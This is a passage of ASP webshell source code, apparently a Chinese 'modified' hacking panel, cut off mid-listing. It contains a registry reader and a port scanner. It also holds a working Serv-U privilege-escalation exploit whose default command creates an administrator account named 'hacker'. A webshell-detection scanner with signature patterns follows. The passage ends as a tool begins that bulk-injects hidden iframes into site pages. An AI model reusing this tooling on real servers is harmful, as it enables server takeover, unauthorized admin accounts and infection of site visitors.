RRS "-------以下似乎要看绑定的网卡,不知道是否准确---------<br/>"
RRS
"HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{8A
465128-8E99-4B0C-AFF3-1348DC55EB2E}\DefaultGateway,REG_MUTI_SZ {默认网
关}<br/>"
RRS
"HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{8A
465128-8E99-4B0C-AFF3-1348DC55EB2E}\NameServer {首DNS}<br/>"
RRS "HKLM\SYSTEM\ControlSet001
\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-
1348DC55EB2E}\TCPAllowedPorts {允许的TCP/IP端口}<br/>"
RRS "HKLM\SYSTEM\ControlSet001
\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-
1348DC55EB2E}\UDPAllowedPorts {允许的UDP端口}<br/>"
RRS "-----------OVER--------------------<br/>"
RRS "HKLM\SYSTEM\ControlSet001\Services\Tcpip\Enum\Count {共几块活动网
卡}<br/>"
RRS "HKLM\SYSTEM\ControlSet001\Services\Tcpip\Linkage\Bind {当前网卡的
序列(把上面的替换)}<br/>"
RRS "</span>"
RRS "</form><hr/>"
if Request("thePath")<>"" then
On Error Resume Next
Set wsX = Server.CreateObject("WScript.Shell")
thePath=Request("thePath")
theArray=wsX.RegRead(thePath)
If IsArray(theArray) Then
For i=0 To UBound(theArray)
RRS "<li>" & theArray(i)
Next
Else
RRS "<li>" & theArray
End If
end if
end sub
sub ScanPort()
Server.ScriptTimeout = 7776000
if request.Form("port")="" then
PortList="21,23,25,80,110,135,139,445,1433,3389,43958"
else
PortList=request.Form("port")
end if
if request.Form("ip")="" then
IP="127.0.0.1"
else
IP=request.Form("ip")
end if
RRS"<p>端口扫描器</p>"
RRS"<form name='form1' method='post' action=''
onSubmit='form1.submit.disabled=true;'>"
RRS"<p>Scan IP: "
RRS" <input name='ip' type='text' class='TextBox' id='ip'
value='"&Request.ServerVariables("LOCAL_ADDR")&"' size='60'>"
RRS"<br>Port List:"
RRS"<input name='port' type='text' class='TextBox' size='60'
value='"&PortList&"'>"
RRS"<br><br>"
RRS"<input name='submit' type='submit' class='buttom' value=' 扫描 '>"
RRS"<input name='scan' type='hidden' id='scan' value='111'>"
RRS"</p></form>"
If request.Form("scan") <> "" Then
timer1 = timer
RRS("<b>扫描报告:</b><br><hr>")
tmp = Split(request.Form("port"),",")
ip = Split(request.Form("ip"),",")
For hu = 0 to Ubound(ip)
If InStr(ip(hu),"-") = 0 Then
For i = 0 To Ubound(tmp)
If Isnumeric(tmp(i)) Then
Call Scan(ip(hu), tmp(i))
Else
seekx = InStr(tmp(i), "-")
If seekx > 0 Then
startN = Left(tmp(i), seekx - 1 )
endN = Right(tmp(i), Len(tmp(i)) - seekx )
If Isnumeric(startN) and Isnumeric(endN) Then
For j = startN To endN
Call Scan(ip(hu), j)
Next
Else
RRS(startN & " or " & endN & " is not number<br>")
End If
Else
RRS(tmp(i) & " is not number<br>")
End If
End If
Next
Else
ipStart = Mid(ip(hu),1,InStrRev(ip(hu),"."))
For xxx = Mid(ip(hu),InStrRev(ip(hu),".")+1,1) to Mid(ip(hu),InStr(ip
(hu),"-")+1,Len(ip(hu))-InStr(ip(hu),"-"))
For i = 0 To Ubound(tmp)
If Isnumeric(tmp(i)) Then
Call Scan(ipStart & xxx, tmp(i))
Else
seekx = InStr(tmp(i), "-")
If seekx > 0 Then
startN = Left(tmp(i), seekx - 1 )
endN = Right(tmp(i), Len(tmp(i)) - seekx )
If Isnumeric(startN) and Isnumeric(endN) Then
For j = startN To endN
Call Scan(ipStart & xxx,j)
Next
Else
RRS(startN & " or " & endN & " is not number<br>")
End If
Else
RRS(tmp(i) & " is not number<br>")
End If
End If
Next
Next
End If
Next
timer2 = timer
thetime=cstr(int(timer2-timer1))
RRS"<hr>Process in "&thetime&" s"
END IF
end sub
Sub Scan(targetip, portNum)
On Error Resume Next
set conn = Server.CreateObject("ADODB.connection")
connstr="Provider=SQLOLEDB.1;Data Source=" & targetip &","&
portNum &";User ID=lake2;Password=;"
conn.ConnectionTimeout = 1
conn.open connstr
If Err Then
If Err.number = -2147217843 or Err.number = -2147467259
Then
If InStr(Err.description, "(Connect()).") > 0
Then
RRS(targetip & ":" & portNum &
".........关闭<br>")
Else
RRS(targetip & ":" & portNum &
".........<font color=red>开放</font><br>")
End If
End If
End If
End Sub
Select Case Action
Case "MainMenu":MainMenu()
Case "getTerminalInfo":getTerminalInfo()
case "ScanPort":ScanPort()
Case "Servu"
SUaction=request("SUaction")
if not isnumeric(SUaction) then response.end
user = trim(request("u"))
pass = trim(request("p"))
port = trim(request("port"))
cmd = trim(request("c"))
f=trim(request("f"))
if f="" then
f=gpath()
else
f=left(f,2)
end if
ftpport = 65500
timeout=3
loginuser = "User " & user & vbCrLf
loginpass = "Pass " & pass & vbCrLf
deldomain = "-DELETEDOMAIN" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "
PortNo=" & ftpport & vbCrLf
mt = "SITE MAINTENANCE" & vbCrLf
newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=goldsun|0.0.0.0|" &
ftpport & "|-1|1|0" & vbCrLf & "-TZOEnable=0" & vbCrLf & " TZOKey=" &
vbCrLf
newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-
PortNo=" & ftpport & vbCrLf & "-User=go" & vbCrLf & "-Password=od" &
vbCrLf & _
"-HomeDir=c:\\" & vbCrLf & "-LoginMesFile=" & vbCrLf & "-
Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _
"-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-
AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _
"-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf &
"-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _
"-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-
SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" &
vbCrLf & _
"-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-
QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _
"-Maintenance=System" & vbCrLf & "-PasswordType=Regular" &
vbCrLf & "-Ratios=None" & vbCrLf & " Access=c:\\|RWAMELCDP" & vbCrLf
quit = "QUIT" & vbCrLf
newuser=replace(newuser,"c:",f)
select case SUaction
case 1
set a=Server.CreateObject("Microsoft.XMLHTTP")
a.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s1",True,
"", ""
a.send loginuser & loginpass & mt & deldomain & newdomain & newuser &
quit
set session("a")=a
RRS"<form method='post' name='goldsun'>"
RRS"<input name='u' type='hidden' id='u' value='"&user&"'></td>"
RRS"<input name='p' type='hidden' id='p' value='"&pass&"'></td>"
RRS"<input name='port' type='hidden' id='port' value='"&port&"'></td>"
RRS"<input name='c' type='hidden' id='c' value='"&cmd&"' size='50'>"
RRS"<input name='f' type='hidden' id='f' value='"&f&"' size='50'>"
RRS"<input name='SUaction' type='hidden' id='SUaction'
value='2'></form>"
RRS"<script language='javascript'>"
RRS"document.write('<center>正在连接 127.0.0.1:"&port&",使用用户名:
"&user&",口令:"&pass&"...<center>');"
RRS"setTimeout('document.all.goldsun.submit();',4000);"
RRS"</script>"
case 2
set b=Server.CreateObject("Microsoft.XMLHTTP")
b.open "GET", "http://127.0.0.1:" & ftpport & "/goldsun/upadmin/s2",
True, "", ""
b.send "User go" & vbCrLf & "pass od" & vbCrLf & "site exec " & cmd &
vbCrLf & quit
set session("b")=b
RRS"<form method='post' name='goldsun'>"
RRS"<input name='u' type='hidden' id='u' value='"&user&"'></td>"
RRS"<input name='p' type='hidden' id='p' value='"&pass&"'></td>"
RRS"<input name='port' type='hidden' id='port' value='"&port&"'></td>"
RRS"<input name='c' type='hidden' id='c' value='"&cmd&"' size='50'>"
RRS"<input name='f' type='hidden' id='f' value='"&f&"' size='50'>"
RRS"<input name='SUaction' type='hidden' id='SUaction'
value='3'></form>"
RRS"<script language='javascript'>"
RRS"document.write('<center>正在提升权限,请等待…………<center>');"
RRS"setTimeout(""document.all.goldsun.submit();"",4000);"
RRS"</script>"
case 3
set c=Server.CreateObject("Microsoft.XMLHTTP")
a.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s3", True,
"", ""
a.send loginuser & loginpass & mt & deldomain & quit
set session("a")=a
RRS"<center>提权完毕,已执行了命令:<br><font
color=red>"&cmd&"</font><br><br>"
RRS"<input type=button value=' 返回继续 ' onClick=""location.href='?
Action=Servu';"">"
RRS"</center>"
case else
on error resume next
set a=session("a")
set b=session("b")
set c=session("c")
a.abort
Set a = Nothing
b.abort
Set b = Nothing
c.abort
Set c = Nothing
RRS"<center><form method='post' name='goldsun'>"
RRS"<table width='494' height='163' border='1' cellpadding='0'
cellspacing='1' bordercolor='#666666'>"
RRS"<tr align='center' valign='middle'>"
RRS"<td colspan='2'>Serv-U 提升权限 漫步云端修改版</td>"
RRS"</tr>"
RRS"<tr align='center' valign='middle'>"
RRS"<td width='100'>用户名:</td>"
RRS"<td width='379'><input name='u' type='text' id='u'
value='LocalAdministrator'></td>"
RRS"</tr>"
RRS"<tr align='center' valign='middle'>"
RRS"<td>口 令:</td>"
RRS"<td><input name='p' type='text' id='p'
value='#l@$ak#.lk;0@P'></td>"
RRS"</tr>"
RRS"<tr align='center' valign='middle'>"
RRS"<td>端 口:</td>"
RRS"<td><input name='port' type='text' id='port' value='43958'></td>"
RRS"</tr>"
RRS"<tr align='center' valign='middle'>"
RRS"<td>系统路径:</td>"
RRS" <td><input name='f' type='text' id='f' value='"&f&"'
size='8'></td>"
RRS" </tr>"
RRS" <tr align='center' valign='middle'>"
RRS" <td>命 令:</td>"
RRS" <td><input name='c' type='text' id='c' value='cmd /c net user
hacker 123456 /add & net localgroup administrators hacker /add'
size='50'></td>"
RRS" </tr>"
RRS" <tr align='center' valign='middle'>"
RRS" <td colspan='2'><input type='submit' name='Submit' value='提
交'> "
RRS"<input type='reset' name='Submit2' value='重置'>"
RRS"<input name='SUaction' type='hidden' id='action' value='1'></td>"
RRS"</tr></table></form></center>"
end select
function Gpath()
on error resume next
err.clear
set f=Server.CreateObject("Scripting.FileSystemObject")
if err.number>0 then
gpath="c:"
exit function
end if
gpath=f.GetSpecialFolder(0)
gpath=lcase(left(gpath,2))
set f=nothing
end function
Case "kmuma"
dim Report
if request.QueryString("act")<>"scan" then
RRS ("<b>网站根目录</b>- "&Server.MapPath("/")&"<br>")
RRS ("<b>本程序目录</b>- "&Server.MapPath("."))
RRS "<form action=""?Action=kmuma&act=scan""
method=""post"" name=""form1"">"
RRS "<p><b>填入你要检查的路径:</b>"
RRS "<input name=""path"" type=""text""
style=""border:1px solid #999"" value=""\"" size=""30"" /> 填“\”网站
根目录;“.”为本程序目录<br><br>"
RRS "你要干什么: <input class=c name=""radiobutton""
type=""radio"" value=""sws"" onClick=""document.getElementById
('showFile1').style.display='none'"" checked>查ASP 马"
RRS "<input class=c type=""radio"" name=""radiobutton""
value=""sf"" onClick=""document.getElementById
('showFile1').style.display=''"">搜索符合条件之文件<br>"
RRS "<br /><div id=""showFile1""
style=""display:none"">"
RRS " 查找内容:<input
name=""Search_Content"" type=""text"" id=""Search_Content""
style=""border:1px solid #999"" size=""20"">"
RRS " 要查找的字符串,不填就只进行日期检查<br />"
RRS " 修改日期:<input name=""Search_Date""
type=""text"" style=""border:1px solid #999"" value="""&Left(Now
(),InStr(now()," ")-1)&""" size=""20""> 多个日期用;隔开,任意日期填写
<a href=""#""
onClick=""javascript:form1.Search_Date.value='ALL'"">ALL</a><br />"
RRS " 文件类型:<input
name=""Search_FileExt"" type=""text"" style=""border:1px solid #999""
value=""*"" size=""20""> 类型之间用,隔开,*表示所有类型<br /><br
/></div>"
RRS "<input type=""submit"" value="" 开始扫描 ""
style=""background:#ccc;border:2px solid #fff;padding:2px 2px 0px
2px;margin:4px;"" />"
RRS "</form>"
else
if request.Form("path")="" then
RRS("路径不能为空")
response.End()
end if
if request.Form("path")="\" then
TmpPath = Server.MapPath("\")
elseif request.Form("path")="." then
TmpPath = Server.MapPath(".")
else
TmpPath = request.Form("path")
end if
timer1 = timer
Sun = 0
SumFiles = 0
SumFolders = 1
If request.Form("radiobutton") = "sws" Then
DimFileExt = "asp,cer,asa,cdx"
Call ShowAllFile(TmpPath)
Else
If request.Form("path") = "" or request.Form
("Search_Date") = "" or request.Form("Search_FileExt") = "" Then
RRS("缉捕条件不完全<br><br><a
href='javascript:history.go(-1);'>请返回重新输入</a>")
response.End()
End If
DimFileExt = request.Form("Search_fileExt")
Call ShowAllFile2(TmpPath)
End If
RRS "<table width=""100%"" border=""0"" cellpadding=""0""
cellspacing=""0"" style='font-size:12px'>"
RRS "<tr><th>Scan WebShell -- 漫步云端修改版</tr>"
RRS "<tr><td style=""padding:5px;line-height:170%;clear:both;font-
size:12px"">"
RRS "<div id=""updateInfo"" style=""background:ffffe1;border:1px solid
#89441f;padding:4px;display:none""></div>"
RRS "扫描完毕!一共检查文件夹<font
color=""#FF0000"">"&SumFolders&"</font>个,文件<font
color=""#FF0000"">"&SumFiles&"</font>个,发现可疑点<font
color=""#FF0000"">"&Sun&"</font>个"
RRS "<table width=""100%"" border=""1"" cellpadding=""0""
cellspacing=""8"" bordercolor=""#999999"" style=""font-
size:12px;border-collapse:collapse;line-height:130%;clear:both;""><tr>"
If request.Form("radiobutton") = "sws" Then
RRS "<td width=""20%"">文件相对路径</td>"
RRS "<td width=""20%"">特征码</td>"
RRS "<td width=""40%"">描述</td>"
RRS "<td width=""20%"">创建/修改时间</td>"
else
RRS "<td width=""50%"">文件相对路径</td>"
RRS "<td width=""25%"">文件创建时间</td>"
RRS "<td width=""25%"">修改时间</td>"
end if
RRS "</tr>"
RRS Report
RRS "<br/></table>"
timer2 = timer
thetime=cstr(int(((timer2-timer1)*10000 )+0.5)/10)
RRS "<br><font style='font-size:12px'>本页执行共用了"&thetime&"毫秒
</font>"
end if
Sub ShowAllFile(Path)
Set F1SO = CreateObject("Scripting.FileSystemObject")
if not F1SO.FolderExists(path) then exit sub
Set f = F1SO.GetFolder(Path)
Set fc2 = f.files
For Each myfile in fc2
If CheckExt(F1SO.GetExtensionName
(path&"\"&myfile.name)) Then
Call ScanFile(Path&Temp&"\"&myfile.name, "")
SumFiles = SumFiles + 1
End If
Next
Set fc = f.SubFolders
For Each f1 in fc
ShowAllFile path&"\"&f1.name
SumFolders = SumFolders + 1
Next
Set F1SO = Nothing
End Sub
Sub ScanFile(FilePath, InFile)
Server.ScriptTimeout=999999999
If InFile <> "" Then
Infiles = "<font color=red>该文件被<a
href=""http://"&Request.Servervariables("server_name")&"/"&tURLEncode
(InFile)&""" target=_blank>"& InFile & "</a>文件包含执行</font>"
End If
Set FSO1s = CreateObject("Scripting.FileSystemObject")
on error resume next
set ofile = FSO1s.OpenTextFile(FilePath)
filetxt = Lcase(ofile.readall())
If err Then Exit Sub end if
if len(filetxt)>0 then
filetxt = vbcrlf & filetxt
temp = "<a href=""http://"&Request.Servervariables
("server_name")&"/"&tURLEncode(replace(replace(FilePath,server.MapPath
("\")&"\","",1,1,1),"\","/"))&""" target=_blank>"&replace
(FilePath,server.MapPath("\")&"\","",1,1,1)&"</a><br />"
temp=temp&"<a href='javascript:FullForm("""&replace(replace
(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")
&""",""EditFile"")' class='am' title='编辑'>编辑</a> "
temp=temp&"<a href='javascript:FullForm("""&replace(replace
(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""DelFile"")'
onclick='return yesok()' class='am' title='删除'>删除</a > "
temp=temp&"<a href='javascript:FullForm("""&replace(replace
(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")
&""",""CopyFile"")' class='am' title='复制'>复制</a> "
temp=temp&"<a href='javascript:FullForm("""&replace(replace
(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")
&""",""MoveFile"")' class='am' title='移动'>移动</a>"
If instr( filetxt, Lcase
("WScr"&DoMyBest&"ipt.Shell") ) or Instr( filetxt, Lcase
("clsid:72C24DD5-D70A"&DoMyBest&"-438B-8A42-98424B88AFB8") ) then
Report =
Report&"<tr><td>"&temp&"</td><td>WScr"&DoMyBest&"ipt.Shell 或者
clsid:72C24DD5-D70A"&DoMyBest&"-438B-8A42-98424B88AFB8</td><td><font
color=red>危险组件,一般被ASP木马利用
</font>"&infiles&"</td><td>"&GetDateCreate(filepath)
&"<br>"&GetDateModify(filepath)&"</td></tr>"
Sun = Sun + 1
temp="-=| 同上 |=-"
End if
If instr( filetxt, Lcase
("She"&DoMyBest&"ll.Application") ) or Instr( filetxt, Lcase
("clsid:13709620-C27"&DoMyBest&"9-11CE-A49E-444553540000") ) then
Report =
Report&"<tr><td>"&temp&"</td><td>She"&DoMyBest&"ll.Application 或者
clsid:13709620-C27"&DoMyBest&"9-11CE-A49E-444553540000</td><td><font
color=red>危险组件,一般被ASP木马利用
</font>"&infiles&"</td><td>"&GetDateCreate(filepath)
&"<br>"&GetDateModify(filepath)&"</td></tr>"
Sun = Sun + 1
temp="-=| 同上 |=-"
End If
Set regEx = New RegExp
regEx.IgnoreCase = True
regEx.Global = True
regEx.Pattern = "\bLANGUAGE\s*=\s*[""]?\s*
(vbscript|jscript|javascript).encode\b"
If regEx.Test(filetxt) Then
Report =
Report&"<tr><td>"&temp&"</td><td>
(vbscript|jscript|javascript).Encode</td><td><font color=red>似乎脚本被
加密了</font>"&infiles&"</td><td>"&GetDateCreate(filepath)
&"<br>"&GetDateModify(filepath)&"</td></tr>"
Sun = Sun + 1
temp="-=| 同上 |=-"
End If
regEx.Pattern = "\bEv"&"al\b"
If regEx.Test(filetxt) Then
Report =
Report&"<tr><td>"&temp&"</td><td>Ev"&"al</td><td>e"&"val()函数可以执行
任意ASP代码<br>但是javascript代码中也可以使用,有可能是误
报。"&infiles&"</td><td>"&GetDateCreate(filepath)&"<br>"&GetDateModify
(filepath)&"</td></tr>"
Sun = Sun + 1
temp="-=| 同上 |=-"
End If
regEx.Pattern = "[^.]\bExe"&"cute\b"
If regEx.Test(filetxt) Then
Report =
Report&"<tr><td>"&temp&"</td><td>Exec"&"ute</td><td><font
color=red>e"&"xecute()函数可以执行任意ASP代码
</font><br>"&infiles&"</td><td>"&GetDateCreate(filepath)
&"<br>"&GetDateModify(filepath)&"</td></tr>"
Sun = Sun + 1
temp="-=| 同上 |=-"
End If
regEx.Pattern = "\.(Open|Create)TextFile\b"
If regEx.Test(filetxt) Then
Report =
Report&"<tr><td>"&temp&"</td><td>.CreateTextFile|.OpenTextFile</td><td>
使用了FSO的CreateTextFile|OpenTextFile读写文
件"&infiles&"</td><td>"&GetDateCreate(filepath)&"<br>"&GetDateModify
(filepath)&"</td></tr>"
Sun = Sun + 1
temp="-=| 同上 |=-"
End If
regEx.Pattern = "\.SaveToFile\b"
If regEx.Test(filetxt) Then
Report =
Report&"<tr><td>"&temp&"</td><td>.SaveToFile</td><td>使用了Stream的
SaveToFile函数写文件"&infiles&"</td><td>"&GetDateCreate(filepath)
&"<br>"&GetDateModify(filepath)&"</td></tr>"
Sun = Sun + 1
temp="-=| 同上 |=-"
End If
regEx.Pattern = "\.Save\b"
If regEx.Test(filetxt) Then
Report =
Report&"<tr><td>"&temp&"</td><td>.Save</td><td>使用了XMLHTTP的Save函数
写文件"&infiles&"</td><td>"&GetDateCreate(filepath)
&"<br>"&GetDateModify(filepath)&"</td></tr>"
Sun = Sun + 1
temp="-=| 同上 |=-"
End If
Set regEx = Nothing
Set regEx = New RegExp
regEx.IgnoreCase = True
regEx.Global = True
regEx.Pattern = "<!--\s*#include\s*file\s*=\s*"".*"""
Set Matches = regEx.Execute(filetxt)
For Each Match in Matches
tFile = Replace(Mid(Match.Value, Instr
(Match.Value, """") + 1, Len(Match.Value) - Instr(Match.Value, """") -
1),"/","\")
If Not CheckExt(FSO1s.GetExtensionName(tFile))
Then
Call ScanFile( Mid(FilePath,1,InStrRev
(FilePath,"\"))&tFile, replace(FilePath,server.MapPath("\")
&"\","",1,1,1) )
SumFiles = SumFiles + 1
End If
Next
Set Matches = Nothing
Set regEx = Nothing
Set regEx = New RegExp
regEx.IgnoreCase = True
regEx.Global = True
regEx.Pattern = "<!--
\s*#include\s*virtual\s*=\s*"".*"""
Set Matches = regEx.Execute(filetxt)
For Each Match in Matches
tFile = Replace(Mid(Match.Value, Instr
(Match.Value, """") + 1, Len(Match.Value) - Instr(Match.Value, """") -
1),"/","\")
If Not CheckExt(FSO1s.GetExtensionName(tFile))
Then
Call ScanFile( Server.MapPath("\")
&"\"&tFile, replace(FilePath,server.MapPath("\")&"\","",1,1,1) )
SumFiles = SumFiles + 1
End If
Next
Set Matches = Nothing
Set regEx = Nothing
Set regEx = New RegExp
regEx.IgnoreCase = True
regEx.Global = True
regEx.Pattern = "Server.(Exec"&"ute|Transfer)([ \t]
*|\()"".*"""
Set Matches = regEx.Execute(filetxt)
For Each Match in Matches
tFile = Replace(Mid(Match.Value, Instr
(Match.Value, """") + 1, Len(Match.Value) - Instr(Match.Value, """") -
1),"/","\")
If Not CheckExt(FSO1s.GetExtensionName(tFile))
Then
Call ScanFile( Mid(FilePath,1,InStrRev
(FilePath,"\"))&tFile, replace(FilePath,server.MapPath("\")
&"\","",1,1,1) )
SumFiles = SumFiles + 1
End If
Next
Set Matches = Nothing
Set regEx = Nothing
Set regEx = New RegExp
regEx.IgnoreCase = True
regEx.Global = True
regEx.Pattern = "Server.(Exec"&"ute|Transfer)([ \t]
*|\()[^""]\)"
If regEx.Test(filetxt) Then
Report =
Report&"<tr><td>"&temp&"</td><td>Server.Exec"&"ute</td><td><font
color=red>不能跟踪检查Server.e"&"xecute()函数执行的文件。
</font><br>"&infiles&"</td><td>"&GetDateCreate(filepath)
&"<br>"&GetDateModify(filepath)&"</td></tr>"
Sun = Sun + 1
End If
Set Matches = Nothing
Set regEx = Nothing
Set XregEx = New RegExp
XregEx.IgnoreCase = True
XregEx.Global = True
XregEx.Pattern = "<scr"&"ipt\s*(.|\n)*?runat\s*=\s*""?
server""?(.|\n)*?>"
Set XMatches = XregEx.Execute(filetxt)
For Each Match in XMatches
tmpLake2 = Mid(Match.Value, 1, InStr
(Match.Value, ">"))
srcSeek = InStr(1, tmpLake2, "src", 1)
If srcSeek > 0 Then
srcSeek2 = instr(srcSeek, tmpLake2,
"=")
For i = 1 To 50
tmp = Mid(tmpLake2, srcSeek2 +
i, 1)
If tmp <> " " and tmp <> chr(9)
and tmp <> vbCrLf Then
Exit For
End If
Next
If tmp = """" Then
tmpName = Mid(tmpLake2,
srcSeek2 + i + 1, Instr(srcSeek2 + i + 1, tmpLake2, """") - srcSeek2 -
i - 1)
Else
If InStr(srcSeek2 + i + 1,
tmpLake2, " ") > 0 Then tmpName = Mid(tmpLake2, srcSeek2 + i, Instr
(srcSeek2 + i + 1, tmpLake2, " ") - srcSeek2 - i) Else tmpName =
tmpLake2
If InStr(tmpName, chr(9)) > 0
Then tmpName = Mid(tmpName, 1, Instr(1, tmpName, chr(9)) - 1)
If InStr(tmpName, vbCrLf) > 0
Then tmpName = Mid(tmpName, 1, Instr(1, tmpName, vbcrlf) - 1)
If InStr(tmpName, ">") > 0 Then
tmpName = Mid(tmpName, 1, Instr(1, tmpName, ">") - 1)
End If
Call ScanFile( Mid(FilePath,1,InStrRev
(FilePath,"\"))&tmpName , replace(FilePath,server.MapPath("\")
&"\","",1,1,1))
SumFiles = SumFiles + 1
End If
Next
Set Matches = Nothing
Set regEx = Nothing
Set regEx = New RegExp
regEx.IgnoreCase = True
regEx.Global = True
regEx.Pattern = "CreateO"&"bject[ |\t]*\(.*\)"
Set Matches = regEx.Execute(filetxt)
For Each Match in Matches
If Instr(Match.Value, "&") or Instr
(Match.Value, "+") or Instr(Match.Value, """") = 0 or Instr
(Match.Value, "(") <> InStrRev(Match.Value, "(") Then
Report =
Report&"<tr><td>"&temp&"</td><td>Creat"&"eObject</td><td>Crea"&"teObjec
t函数使用了变形技术"&infiles&"</td><td>"&GetDateCreate(filepath)
&"<br>"&GetDateModify(filepath)&"</td></tr>"
Sun = Sun + 1
exit sub
End If
Next
Set Matches = Nothing
Set regEx = Nothing
end if
set ofile = nothing
set FSO1s = nothing
End Sub
Function CheckExt(FileExt)
If DimFileExt = "*" Then CheckExt = True
Ext = Split(DimFileExt,",")
For i = 0 To Ubound(Ext)
If Lcase(FileExt) = Ext(i) Then
CheckExt = True
Exit Function
End If
Next
End Function
Function GetDateModify(filepath)
Set F2SO = CreateObject("Scripting.FileSystemObject")
Set f = F2SO.GetFile(filepath)
s = f.DateLastModified
set f = nothing
set F2SO = nothing
GetDateModify = s
End Function
Function GetDateCreate(filepath)
Set F3SO = CreateObject("Scripting.FileSystemObject")
Set f = F3SO.GetFile(filepath)
s = f.DateCreated
set f = nothing
set F3SO = nothing
GetDateCreate = s
End Function
Function tURLEncode(Str)
temp = Replace(Str, "%", "%25")
temp = Replace(temp, "#", "%23")
temp = Replace(temp, "&", "%26")
tURLEncode = temp
End Function
Sub ShowAllFile2(Path)
Set F4SO = CreateObject("Scripting.FileSystemObject")
if not F4SO.FolderExists(path) then exit sub
Set f = F4SO.GetFolder(Path)
Set fc2 = f.files
For Each myfile in fc2
If CheckExt(F4SO.GetExtensionName
(path&"\"&myfile.name)) Then
Call IsFind(Path&"\"&myfile.name)
SumFiles = SumFiles + 1
End If
Next
Set fc = f.SubFolders
For Each f1 in fc
ShowAllFile2 path&"\"&f1.name
SumFolders = SumFolders + 1
Next
Set F4SO = Nothing
End Sub
Sub IsFind(thePath)
theDate = GetDateModify(thePath)
on error resume next
theTmp = Mid(theDate, 1, Instr(theDate, " ") - 1)
if err then exit Sub
xDate = Split(request.Form("Search_Date"),";")
If request.Form("Search_Date") = "ALL" Then ALLTime = True
For i = 0 To Ubound(xDate)
If theTmp = xDate(i) or ALLTime = True Then
If request("Search_Content") <> "" Then
Set FSO2s = CreateObject
("Scripting.FileSystemObject")
set ofile = FSO2s.OpenTextFile(thePath,
1, false, -2)
filetxt = Lcase(ofile.readall())
If Instr( filetxt, LCase(request.Form
("Search_Content"))) > 0 Then
temp = "<a
href=""http://"&Request.Servervariables("server_name")&"/"&tURLEncode
(Replace(replace(thePath,server.MapPath("\")&"\","",1,1,1),"\","/"))
&""" target=_blank>"&replace(thePath,server.MapPath("\")&"\","",1,1,1)
&"</a>"
temp=temp&" → <a href='javascript:FullForm("""&replace(replace
(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")
&""",""EditFile"")' class='am' title='编辑'>编辑</a> "
temp=temp&"<a href='javascript:FullForm("""&replace(replace
(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""DelFile"")'
onclick='return yesok()' class='am' title='删除'>删除</a > "
temp=temp&"<a href='javascript:FullForm("""&replace(replace
(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")
&""",""CopyFile"")' class='am' title='复制'>复制</a> "
temp=temp&"<a href='javascript:FullForm("""&replace(replace
(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")
&""",""MoveFile"")' class='am' title='移动'>移动</a>"
Report = Report&"<tr><td
height=30>"&temp&"</td><td>"&GetDateCreate(thePath)
&"</td><td>"&theDate&"</td></tr>"
Report =
Report&"<tr><td>"&temp&"</td><td>"&GetDateCreate(thePath)
&"</td><td>"&theDate&"</td></tr>"
Sun = Sun + 1
Exit Sub
End If
ofile.close()
Set ofile = Nothing
Set FSO2s = Nothing
Else
temp = "<a
href=""http://"&Request.Servervariables("server_name")&"/"&tURLEncode
(replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","/"))
&""" target=_blank>"&replace(thePath,server.MapPath("\")&"\","",1,1,1)
&"</a> "
temp=temp&"<a href='javascript:FullForm("""&replace(replace
(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")
&""",""EditFile"")' class='am' title='编辑'>编辑</a> "
temp=temp&"<a href='javascript:FullForm("""&replace(replace
(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""DelFile"")'
onclick='return yesok()' class='am' title='删除'>删除</a > "
temp=temp&"<a href='javascript:FullForm("""&replace(replace
(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")
&""",""CopyFile"")' class='am' title='复制'>复制</a> "
temp=temp&"<a href='javascript:FullForm("""&replace(replace
(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")
&""",""MoveFile"")' class='am' title='移动'>移动</a>"
Report = Report&"<tr><td
height=30>"&temp&"</td><td>"&GetDateCreate(thePath)
&"</td><td>"&theDate&"</td></tr>"
Sun = Sun + 1
Exit Sub
End If
End If
Next
End Sub
Case "plgm"
Server.ScriptTimeout=1000000
Response.Buffer=False
RRS ("<b>当前网站绝对路径:")&Server.MapPath("/")&("</b>")
ASP_SELF=Request.ServerVariables("PATH_INFO")
s=Request("fd")
if s="" then s=Server.MapPath("/")
ex=Request("ex")
pth=Request("pth")
newcnt=Request("newcnt")
addcode = Request("code")
if addcode="" then addcode="<iframe src=http://127.0.0.1/m.htm width=0
height=0></iframe>"
If ex<>"" AND pth<>"" Then
select Case ex
Case "edit"
CALL file_show(pth)
Case "save"
CALL file_save(pth)
End select
Else
RRS("<form method=""POST""> ")
RRS("<table width=560 border=""0"" style=""font-size:12px;"">")
RRS("<tr>")
RRS("<td width=""102"">要挂马文件夹的绝对路径:</td>")
